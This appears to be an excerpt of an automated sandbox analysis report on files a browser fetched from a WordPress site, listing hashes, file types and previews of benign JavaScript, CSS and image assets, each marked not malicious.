                                                                                                          Size (bytes):771
                                                                                                          Entropy (8bit):4.987651578772006
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:owzOKRzEPIiI1fI6VKcyLrbkfVwSvprGR3/Ri1tdzCj:H+H6fI+KcyjYRA3IEj
                                                                                                          MD5:2399EF783701F73C399589AE95298B0F
                                                                                                          SHA1:3E1F2A7AC9DCB2B50B1F1CF768441E46FD9F62EE
                                                                                                          SHA-256:2DEA57483641F8762937DFD9B09126A9B21C88BD3D7486186003E0BBB9043145
                                                                                                          SHA-512:50F1C2B16C8C2FC62C504A33529DCEF3FDBDD1533206C8779772CBBA1A336C7C5BBB533A35F99E559ADED3D1BF0C858C10A04EC083969F47A29DEAC92E366FA1
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:"use strict";var WPFormsElementorFrontend=window.WPFormsElementorFrontend||function(o,e,n){var r={init:function(){r.events()},events:function(){e.addEventListener("elementor/popup/show",function(e){e=n("#elementor-popup-modal-"+e.detail.id).find(".wpforms-form");e.length&&r.initFields(e)})},initFields:function(e){wpforms.ready(),"undefined"!=typeof wpformsModernFileUpload&&wpformsModernFileUpload.init(),"undefined"!=typeof wpformsRecaptchaLoad&&("recaptcha"===wpformsElementorVars.captcha_provider&&"v3"===wpformsElementorVars.recaptcha_type?"undefined"!=typeof grecaptcha&&grecaptcha.ready(wpformsRecaptchaLoad):wpformsRecaptchaLoad()),n(o).trigger("wpforms_elementor_form_fields_initialized",[e])}};return r}(document,window,jQuery);WPFormsElementorFrontend.init();
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", progressive, precision 8, 1706x2560, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):196368
                                                                                                          Entropy (8bit):7.865958617799944
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:FeAPSSWtKwho6FSN3Xuc+X0iAoXE9Pgk/YC9mnymfXoszK:FeAPSScKwho4SJuc3noXE9PgkgC90e
                                                                                                          MD5:02D8CA3C6CAF7DB4587CAF9C9B13DF41
                                                                                                          SHA1:2E788AB30E35E5B88E12F4F1FFEA28A440A1940A
                                                                                                          SHA-256:6C26536E00E19708E36196B5CE05D48A1590E6D5F206E7A9C94C1A4116DCFCF2
                                                                                                          SHA-512:C2DDD5B03FDB9E4685337613612B10AAAC67E2428C38F7E1B0D397CAAB1FECDB04B0D9935ADFE50EEC4401A2545A92D3968767471315AA89C06C63372FAA1B9B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."..............................................................................X.................................................................................................................................................................E..................................................................................R...............................................................................@..................................................................................(..............................................................................J.D................................................................................ ...................................................................@....................................................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (41067)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):41171
                                                                                                          Entropy (8bit):5.038063560031163
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Ls4TfJuknYrmL1+y3y2yVRRV7Ry2ySx76gVMu9FdopOyqKy+gyIpKQPmchIUUe8a:w4TtQObixPRix076gVMAAESuPqUUe8a
                                                                                                          MD5:B5C1F83E8E2C9FAD4A9C7A7E8C34B2FA
                                                                                                          SHA1:A1C7A35489061767940A66B546466FF5212A4625
                                                                                                          SHA-256:67ADFDAC93B9EC1899CD00E55AC1B217E109DC5B379C3E2940F91F8A64F2DD2F
                                                                                                          SHA-512:919B2ABE6C3DE18F21CA1C2D59926F0EDA1BC10F692E11750EE22F72A4AEADA71B467E9626CD4887ED387E91FFF1DD4214ACACA7B5C0D6D47401ADA328B4D052
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.rangeSlider.min.js?ver=3.3.0
                                                                                                          Preview:// Ion.RangeSlider, 2.3.1, . Denis Ineshin, 2010 - 2019, IonDen.com, Build date: 2019-12-19 16:56:44.!function(i){"undefined"!=typeof jQuery&&jQuery||"function"!=typeof define||!define.amd?"undefined"!=typeof jQuery&&jQuery||"object"!=typeof exports?i(jQuery,document,window,navigator):i(require("jquery"),document,window,navigator):define(["jquery"],function(t){return i(t,document,window,navigator)})}(function(a,c,l,t,_){"use strict";var i,s,o=0,e=(i=t.userAgent,s=/msie\s\d+/i,0<i.search(s)&&s.exec(i).toString().split(" ")[1]<9&&(a("html").addClass("lt-ie9"),!0));Function.prototype.bind||(Function.prototype.bind=function(o){var e=this,h=[].slice;if("function"!=typeof e)throw new TypeError;var r=h.call(arguments,1),n=function(){if(this instanceof n){var t=function(){};t.prototype=e.prototype;var i=new t,s=e.apply(i,r.concat(h.call(arguments)));return Object(s)===s?s:i}return e.apply(o,r.concat(h.call(arguments)))};return n}),Array.prototype.indexOf||(Array.prototype.indexOf=function(t,i
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:troff or preprocessor input, ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2598
                                                                                                          Entropy (8bit):4.897540123149002
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:PS8vqRkxtExSZa5MqRkxtExwwdwBanaSu1RcU3cTUUgRgXG6UUF49VAvHamf9RJI:PRvZ0j5MZ0njZgRg2yF4I9RJBS95
                                                                                                          MD5:6F36B1309FBBDE634A5D54DD1734274A
                                                                                                          SHA1:A94E730430930B2E048352996FF44BF28647669D
                                                                                                          SHA-256:7B6508C9E8E04DE8EBFEC5DE2CE1C4303BC46A0A279283EFF7E248C1C900A91B
                                                                                                          SHA-512:DB1CE7084979CB94F986E2768429B086F56D206545D63FDA354109C22FC1CE958F284CEC64F1A9C273F526B20C9A33E941A56271639856EF10BC0220F61C2FF7
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/vendors/perfect-scrollbar/perfect-scrollbar.css?ver=1.5.0
                                                                                                          Preview:/*. * Container style. */..ps {. overflow: hidden !important;. overflow-anchor: none;. -ms-overflow-style: none;. touch-action: auto;. -ms-touch-action: auto;.}../*. * Scrollbar rail styles. */..ps__rail-x {. display: none;. opacity: 0;. transition: background-color .2s linear, opacity .2s linear;. -webkit-transition: background-color .2s linear, opacity .2s linear;. height: 15px;. /* there must be 'bottom' or 'top' for ps__rail-x */. bottom: 0px;. /* please don't change 'position' */. position: absolute;.}...ps__rail-y {. display: none;. opacity: 0;. transition: background-color .2s linear, opacity .2s linear;. -webkit-transition: background-color .2s linear, opacity .2s linear;. width: 15px;. /* there must be 'right' or 'left' for ps__rail-y */. right: 0;. /* please don't change 'position' */. position: absolute;.}...ps--active-x > .ps__rail-x,..ps--active-y > .ps__rail-y {. display: block;. background-color: transparent;.}...ps:hover > .ps__rail-x,..ps:hover
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3265
                                                                                                          Entropy (8bit):4.796067829007445
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7SbrUzKqv5GjBcJNkfu9Hu9kdYda+xx1UmxvmXyiD2HrPYMi6zi732K3lUgsQovp:B58BcJNd1RdYdpxcmgXyiqylChf
                                                                                                          MD5:B2DE6B41987CA830D4A394A21E0FE6DC
                                                                                                          SHA1:0F18FC00D00A92553F84F4F119760411DA2623F4
                                                                                                          SHA-256:8C80109A216052DBEB4C67FFDD0F0758B674186C62910CCC5E63F1F81E52828E
                                                                                                          SHA-512:9758C59B661D7C2D2B1D34EC493641564B0F965BD55A804534C00B5501689875E439CE93DBD646F3D7ADFA41AC1236E30A0A5C99FD9AF040566DD10F7968882B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:"use strict";.function woof_init_colors() {. //http://jsfiddle.net/jtbowden/xP2Ns/. jQuery('.woof_color_term').each(function () {.. var color = jQuery(this).data('color');. var img = jQuery(this).data('img');.. var bg = '';. if (img.length > 0) {. bg = 'background: url(' + img + ')';. } else {. bg = 'background:' + color + ' !important';. }.. var span = jQuery('<span style="' + bg + '" class="' + jQuery(this).attr('type') + ' ' + jQuery(this).attr('class') + '" title=""></span>').on('click', woof_color_do_check).mousedown(woof_color_do_down).mouseup(woof_color_do_up);. if (jQuery(this).is(':checked')) {. span.addClass('checked');. }. jQuery(this).wrap(span).hide();. jQuery(this).after('<span class="woof_color_checked"></span>');//for checking. });.. function woof_color_do_check() {. var is_checked = false;. var radio=false;. if(jQuery(this).pare
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:GIF image data, version 89a, 24 x 24
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2545
                                                                                                          Entropy (8bit):7.144078312196678
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HKJqZ5vxZv9ud9c5674XCj1MWBXqSP6kn6daLzvBEKP:HwYJIdGU74yj1RXq9k6dafv+
                                                                                                          MD5:4B3AFB84B2B71EF56DF09997A350BD04
                                                                                                          SHA1:ACCDAC8A7ABEAB0E21C49539AAD0A973ADDB28EF
                                                                                                          SHA-256:9034D5D34015E4B05D2C1D1A8DC9F6EC9D59BD96D305EB9E24E24E65C591A645
                                                                                                          SHA-512:D65078B5D13873ADB363472B5C358F6B42C128B530F8FEBA9776F8E4906CC97F20EE7BF1E823336CDA8049147A9C7FA5E4016F07F96EC154F3774FBDE1A564B6
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/revslider/public/assets/assets/loader.gif
                                                                                                          Preview:GIF89a...........................................vvv......hhh..........................................!..Created with ajaxload.info.!.......!..NETSCAPE2.0.....,........... .$.AeZ...<...Q46.<...A.......H.a....:....ID0.F...a\xG.3...!...O:-....Rj...TJ..*........t...........~."...ds]......)t...-"...i;H>.n.Qg]_*......R.3.....GI?.....v$...j3!.!.......,........... .$.0eZ..y..0..q ..P..W...)";..qX.^..D50......<H3.!.....k-.n..a. .(.i...d.$P@y.w`.J..#.....?..y........o...g.....f....'8..{..'C.p`j.n."...2.{.`x...jy.4...C,.4..o#n.$.....!.!.......,........... .$. eZ...$.2.....q....E. ....p$H@D/.....G.D.j8v#..P((D..... ..N.(3..#.y....(@...gUx*.kK.).....?K...............$..."....*.......K.....W......x..?.G...#.W....n.h.K,.....+.....*!.!.......,........... .$ .eZ..Y.$1..Q(c......O'"............. 1....q.d"..A.....V.x8p..4988.MRC.@....e*.3@.iI.)..'.?I.........@.......,.....#.........5..,.....".E..z...?..@.E...@.....).....*!.!.......,........... .$.(e..$....C.E1..;...('2$..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2914
                                                                                                          Entropy (8bit):5.454731226636154
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:WocSyckCkOcKjCiKjyImm2PP/KOQpSIVOz2TjNB2PVT/ZQ+pAKLVp2mBKjEkvZLr:WocSyckCkOc4Ci4arPivLHMVTS+p/fBI
                                                                                                          MD5:FD6449587DFAF05DAA350E2834EFE720
                                                                                                          SHA1:05F47DD3212FC8DAB7A4A9BD99F712B3CFF8CA49
                                                                                                          SHA-256:2392F9C1DAEA3B76288DD76C196D119E65B0ADB41D6EEE0AA5859AA0D2DE21B3
                                                                                                          SHA-512:81B5A12C2CE15A2A8383AF43921CB02FE089BE86968661CF3DCF92A86F51D497AA373F47808ACDB33BE4D7324B37BE2B332A77B305AD495CD8A96147BD07D949
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=6.7.1
                                                                                                          Preview:if ('undefined' === typeof BG_SHCE_USE_EFFECTS) {..BG_SHCE_USE_EFFECTS = '0';.} .if ('undefined' === typeof BG_SHCE_TOGGLE_SPEED) {..BG_SHCE_TOGGLE_SPEED = '0';.} .if ('undefined' === typeof BG_SHCE_TOGGLE_OPTIONS) {..BG_SHCE_TOGGLE_OPTIONS = 'swing';.}.if ('undefined' === typeof BG_SHCE_TOGGLE_EFFECT) {..BG_SHCE_TOGGLE_EFFECT = '';.}...function bgExpandCollapsedContent() {..var bgCollapseExpandItems = document.querySelectorAll('input[bg_collapse_expand]');....for ( i=0; i<bgCollapseExpandItems.length; i++) {......var showHideButton = document.getElementById('bg-showmore-action-'+bgCollapseExpandItems[i].value);....var hiddenContent = document.getElementById('bg-showmore-hidden-'+bgCollapseExpandItems[i].value);......if (showHideButton && hiddenContent) {....if (window.addEventListener) {.....showHideButton.addEventListener('click', function(event) {bgExpandCollapsedContentAction(event, this);} );....}....else {.....window.attachEvent("onclick", function(event) {bgExpandCollapsedConten
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 7680 x 4321, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768735
                                                                                                          Entropy (8bit):7.612214171991631
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:4mOG34LIO4yW9q8noy68AH/hqKsov9TrbVNMyBTI46bsoIDOCBQYIToxh9Kl2KBc:4OOT4L9q8no8A5qFov9TrhNMyBkrbDwh
                                                                                                          MD5:70C2D73BD92BDD0CD5C245D5A969DB10
                                                                                                          SHA1:663487CB9B4E5A33C0B1A53511F5D2DCD0EC1FFC
                                                                                                          SHA-256:B5324B4AEBAE05525F9056FA04A3FE3EB7287E83F376B272EC9ADBCA3C2B58D5
                                                                                                          SHA-512:A9A801765DC83D0A60581092204D416CD9C7FA041C65D6762EB13F0802F9E8DF43C7DCDB42BDBC447805BE0D6800B627A29F6E9BD335BDA016AD9FC8D0D7F9A4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR.............}..6....pHYs..,J..,J.wztM.. .IDATx...[v.:.(XKk......g..SU.*...H<e..'..@.oB../...............................?....~...|..p}..@..z...~..........xA...N....G...7.............ze?.....J..9fg.0....7.~..Y......W..Pz..c.f...g..1....I~............^..GL.}ul..`x.?/.....B....c{....>g.7.7Y...b... i.....W..........?I.........#.G.~.....&......|....X.....{.../.....by...%...I..........y.<R..c~4..>?..e[^.......X.l......d.c<?.N.&...1f_V?..n..p}2>...os..c...W,..Y.Z.Q..x.M.I|MyI..l~.l...............O.|..m;}J...f.}.?..z.*^.z.n.W.?;?.>.?~~>........+{..|T.s5........mo..U.....].2...ht.Y.o.F...Kf...V....P._...:z..[.3...Y.Y}...kw}^..z.{o..Zo.{.Go}...m...Woy.}..|.w<.;^.........6{.jt......~G.w.......f..F......F.....=...?...ef.oso.zro...=..Z.......6z.`.z...Nfu.....qv........O./v......c..z.?.._.....{.....Cz..}...........6.X.c}...G../.^...;.jx...,=..kz..~st}kZ..~f.G.....[:.|./.|?2.o....F.wg...n.N[..:m}+}>M.....V.....V._..K.....sE...D...fz.{.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3382
                                                                                                          Entropy (8bit):4.825319082963539
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7gmYzyHFCMukveK+RbFFBd/0UEwKKLfDfXf+:nY2FCz5fDfXf+
                                                                                                          MD5:D9E5D57FD0EBF37D1F24860DB345293C
                                                                                                          SHA1:BCEC14EE17A157FE543D5772BA03610F02BD0D2A
                                                                                                          SHA-256:93D9177503F6230BA587E755E030E87FB40ACDA1A57268ED46C3886FFAFC6C53
                                                                                                          SHA-512:4729416B814E159A3D15124C17B1A4DC74CAA854092DDE30AA917B2E16FB35CF802B570C6B4F8FDA8EF4CE07C27CB9C5105087B3CA856888C1751AE358FC3A0C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/css/category_bg.css?ver=1.0.8
                                                                                                          Preview:.ciena-category-background {. position: relative;. height: 100vh;. overflow: hidden;.}..ciena-category-background .category_content_wrap {. position: relative;. z-index: 2;. display: table;. height: 100%;. table-layout: fixed;. width: 100%;. text-align: center;. padding-top: 100px;.}..ciena-category-background .category_content_wrap .categories-item {. display: table-cell;. vertical-align: bottom;. border-top: 1px solid rgba(255, 255, 255, 0.2);. border-right: 1px solid rgba(255, 255, 255, 0.2);. text-align: right;.}..ciena-category-background .category_content_wrap .categories-item:last-child {. border-right: none;.}..ciena-category-background .category_content_wrap .categories-item .cat-name {. text-align: center;.}..ciena-category-background .category_content_wrap .categories-item .cat-name .cat-link {. color: #fff;. transform: translateY(-100px);. display: flex;. flex-direction: column;. align-items: center;. height: 70px;. justify-content: space-between;.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (1083)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1284
                                                                                                          Entropy (8bit):5.120305588181906
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:NVNdp+zAgb6XGx5EXT+ui3gFAlRFU+FMilTT3ygA+Pkn8A+Pk5n:NVNd8HH3dlRF5uilTTfJPk8JPk5
                                                                                                          MD5:ED130C8D00BA37D0E75E013974D88F75
                                                                                                          SHA1:366C717C004578EC0AC0D4390021D07114A26125
                                                                                                          SHA-256:2B48BE97458E30F257FC46FB5E93548F35DD52FC4C91BA441DA504BA89A5C45E
                                                                                                          SHA-512:877999E20F90FA3E873533E34F7774C28DC499211B7175065FA52B4BC1407CF6AD9DD6AD1236017DA6D0BBB4289333D7AC0E791A41EB8DF4F019107F55D671AC
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touch-punch.min.js?ver=6.6.1
                                                                                                          Preview:/*!. * jQuery UI Touch Punch 0.2.3. *. * Copyright 2011.2014, Dave Furfero. * Dual licensed under the MIT or GPL Version 2 licenses.. *. * Depends:. * jquery.ui.widget.js. * jquery.ui.mouse.js. */.!function(t){var o,e,u,n;function c(o,t){var e,u;1<o.originalEvent.touches.length||(o.preventDefault(),e=o.originalEvent.changedTouches[0],(u=document.createEvent("MouseEvents")).initMouseEvent(t,!0,!0,window,1,e.screenX,e.screenY,e.clientX,e.clientY,!1,!1,!1,!1,0,null),o.target.dispatchEvent(u))}t.support.touch="ontouchend"in document,t.support.touch&&(o=t.ui.mouse.prototype,e=o._mouseInit,u=o._mouseDestroy,o._touchStart=function(o){!n&&this._mouseCapture(o.originalEvent.changedTouches[0])&&(n=!0,this._touchMoved=!1,c(o,"mouseover"),c(o,"mousemove"),c(o,"mousedown"))},o._touchMove=function(o){n&&(this._touchMoved=!0,c(o,"mousemove"))},o._touchEnd=function(o){n&&(c(o,"mouseup"),c(o,"mouseout"),this._touchMoved||c(o,"click"),n=!1)},o._mouseInit=function(){var o=this;o.element.on({touchstar
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with very long lines (13054), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13054
                                                                                                          Entropy (8bit):5.177767631277299
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:I/Igki2JjSTXMpzZJ3eY+3kY+H6cqv8s+pfYm03pYToAAA:I/IgNwjSTXMpeY+3kY0dqv8s+pfYm03M
                                                                                                          MD5:917602D642F84A211838F0C1757C4DC1
                                                                                                          SHA1:392DF3FB4B0EC96CE4EBB5616E6B2A5C55A54BF8
                                                                                                          SHA-256:D702E5ED1E573918D912775AC1E88987FC177AA51EFE1253A08F71AB54F96516
                                                                                                          SHA-512:92AFC44A2405434F119E8E57732E232CDFADBDBA1948D3E89EAB596282119D14CF9707F36037B22C9DD6F3104AADECC28B9301D044842D60DD43CEA98DDBC929
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:(()=>{"use strict";const e=e=>Math.abs(parseInt(e,10)),t=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},a=(e,a)=>{const n=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["validating","validating"],["payment_required","payment-required"]]);n.has(a)&&(a=n.get(a)),Array.from(n.values()).includes(a)||(a=`custom-${a=(a=a.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const r=e.getAttribute("data-status");if(e.wpcf7.status=a,e.setAttribute("data-status",a),e.classList.add(a),r&&r!==a){e.classList.remove(r);const a={contactFormId:e.wpcf7.id,pluginVersion:e.wpcf7.pluginVersion,contactFormLocale:e.wpcf7.locale,unitTag:e.wpcf7.unitTag,containerPostId:e.wpcf7.containerPost,status:e.wpcf7.status,prevStatus:r};t(e,"st
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):145
                                                                                                          Entropy (8bit):4.858959706976188
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:G6tNf/66Tb+IihwJ85EH6SjMevskV/YpHzGJLLK:/9y47+wJ6EH3jf0ke0FG
                                                                                                          MD5:5156C949306BA5F0A676C709117C8AD1
                                                                                                          SHA1:0DA6688897598D5D2D84265EDCC428B1CDC19D06
                                                                                                          SHA-256:526493CFCA4D1B80A4678FB7C720F4059955CA78D5C8EDF67816E3CA2C2AF590
                                                                                                          SHA-512:14D8342B3A5139684BC7CD0ABF0BA550F4AA714D52430BF03ABFE813CCA1C62373AE030928E0815363F2C16ADC8098BEB7FC0DAB03729EB3819CCE981A2B6258
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/css/fmtpl-menu.css?ver=1.0.4
                                                                                                          Preview:.fmtpl-menu .nav_menu_content.has_item_divider .menu-item:after {. content: "";. display: block;.}../*# sourceMappingURL=fmtpl-menu.css.map */.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):440
                                                                                                          Entropy (8bit):7.030367132128833
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:6v/7m/6T/Hru0XU27qHmAc//lU+UqDa/lpcXxg:b/6fu0X2EWqD0iX2
                                                                                                          MD5:7AFB68F6F985FF9DA11D01FBAA61EE8D
                                                                                                          SHA1:B87A5E7620392C23A02507B29655F0AA43F8A8C0
                                                                                                          SHA-256:19F3B464EFAC9CBAC3BC1224A39CD06BAD1FE361DE9C1794EF50FDAED825C67F
                                                                                                          SHA-512:F77F03CADD5B98C63259DF75506F66241341412AC960C043C0CFA8C0A1820345385B876FE627F5576451EFD6E1B22F4705A675860AEBB0449C61B2E1E3ADC804
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR................a....pHYs................ cHRM..z%..............u0...`..:....o._.F...>IDATx..=N.@....m@.$."MJ:..U.4...C..$..F..(Bb.g....Xq.v.(#.vF.}.f...61.l....Y.'..gwW_..7........B..........W~.u|TPV.....h.@.|FbSF:i../.?8.G...B....=%..F...e..h.B.m4#.....~*~<)...M.0.'.$.i#..<\..N.....RZ.6^|#..2.3......&jG.U.Z.P..8;g..zD<.P....Z..A[[20....R/.(..1.l...3~..<.....u.]+g.t.>....$....b..5.r..M..w....hL.....IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):5879
                                                                                                          Entropy (8bit):4.852849803250077
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:QMqCMUWwCMJ/OLh0iftkaKoZEvM2CEz81:QMqC7BCa4woZ32CEg
                                                                                                          MD5:640413C6D8159FEE87A693B9CB96C37B
                                                                                                          SHA1:EE0B88E0FFF31B32CD6D8B7FB90BACF18672DB93
                                                                                                          SHA-256:E96BFA99D8571EDE293575643BF30AB3D74A9C689AD6651CF39FBC2A0BA7B663
                                                                                                          SHA-512:92DC0C81818A0FB0D6C8198934DC32CB38D62612800800B1228C26D4D1F93A6EDB461199E04D27AF66079F3322A73A9EC1E2623328E44DB8C5A79FEF1ADFA02D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/css/fmtpl-addons.css?ver=1.0.4
                                                                                                          Preview:.fmtpl-elementor-widget svg {. width: 1em;. height: 1em;.}..fmtpl-elementor-widget .fmtpl-widget-title .highlight {. font-weight: 900;. color: #000;.}...fmtpl-elementor-main-swiper .elementor-swiper-button {. display: flex;. align-items: center;. justify-content: center;.}..fmtpl-elementor-main-swiper .elementor-swiper-button.elementor-swiper-button-prev > span {. margin-left: 10px;.}..fmtpl-elementor-main-swiper .elementor-swiper-button.elementor-swiper-button-next > span {. margin-right: 10px;.}..fmtpl-elementor-main-swiper .fmtpl-post-readmore {. display: inline-block;.}..fmtpl-elementor-main-swiper .swiper-pagination.disabled {. display: none !important;.}..fmtpl-elementor-main-swiper .swiper-pagination.swiper-pagination-bullets .swiper-pagination-bullet {. border-radius: initial;.}..a.fmtpl-button-default {. display: inline-flex;. align-items: center;. justify-content: center;.}.a.fmtpl-button-default.left .fmtpl-btn-icon {. margin-right: 6px;.}.a.fmtpl-button-defa
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (10019)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):18468
                                                                                                          Entropy (8bit):4.942984129844562
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:FKJ30sBCwYe4oHjDl5fyLrHNck7Ige24YS5bqvcVV+:FKJ30sBCwYocYlm
                                                                                                          MD5:4601BA55044413706C2022CB6C1C3D05
                                                                                                          SHA1:5103EC2FBB389568EBF5CFE4FD721F3DF2FF7AEC
                                                                                                          SHA-256:FE513EF974B767510D0A2B9F1B4D3AFA53185B89AB617C869E5E3D6DB960192C
                                                                                                          SHA-512:8DAB2D19378E34B40043621AAC57B418E56486DCFEBD1A5991BE8A02EE6B071D07EC6BFD9408DEA8FF0198995DE9D42A46E66513D68B40B68056707E4E691E01
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.6.1
                                                                                                          Preview:@keyframes bounce{20%,53%,80%,from,to{animation-timing-function:cubic-bezier(.215,.61,.355,1);transform:translate3d(0,0,0)}40%,43%{animation-timing-function:cubic-bezier(.755,.050,.855,.060);transform:translate3d(0,-30px,0)}70%{animation-timing-function:cubic-bezier(.755,.050,.855,.060);transform:translate3d(0,-15px,0)}90%{transform:translate3d(0,-4px,0)}}.bounce{animation-name:bounce;transform-origin:center bottom}@keyframes flash{50%,from,to{opacity:1}25%,75%{opacity:0}}.flash{animation-name:flash}@keyframes pulse{from,to{transform:scale3d(1,1,1)}50%{transform:scale3d(1.05,1.05,1.05)}}.pulse{animation-name:pulse}@keyframes rubberBand{from,to{transform:scale3d(1,1,1)}30%{transform:scale3d(1.25,.75,1)}40%{transform:scale3d(.75,1.25,1)}50%{transform:scale3d(1.15,.85,1)}65%{transform:scale3d(.95,1.05,1)}75%{transform:scale3d(1.05,.95,1)}}.rubberBand{animation-name:rubberBand}@keyframes shake{from,to{transform:translate3d(0,0,0)}10%,30%,50%,70%,90%{transform:translate3d(-10px,0,0)}20%,40%
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (11513), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):11513
                                                                                                          Entropy (8bit):5.205720179763049
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:wNmuf8NM+UHN9Rr7lZBNWzd4PMfm/vx3imWAel/L0Fx18b2VautyX2fkiYgu0OOJ:wwuf8N5UHvRr5ZBNW+PMfm/hibLexa2b
                                                                                                          MD5:EFC27E253FAE1B7B891FB5A40E687768
                                                                                                          SHA1:AD12044651FFAC0BADCD0E42F32EDEF91678B1FF
                                                                                                          SHA-256:46E36DD6CA93014E4915C723632BF180D27CC96CCFB7C26E69213E1A82129A62
                                                                                                          SHA-512:42FAD6D6BEEAB116CBE8B149DF6B64D65C4998C0A2CC0562BC831AD02ACD82F2B6B9B33836047AAFD6C2D7CF31A6E91FEACA42A2FA6C6077B7F737DEA40D36E6
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.9.6
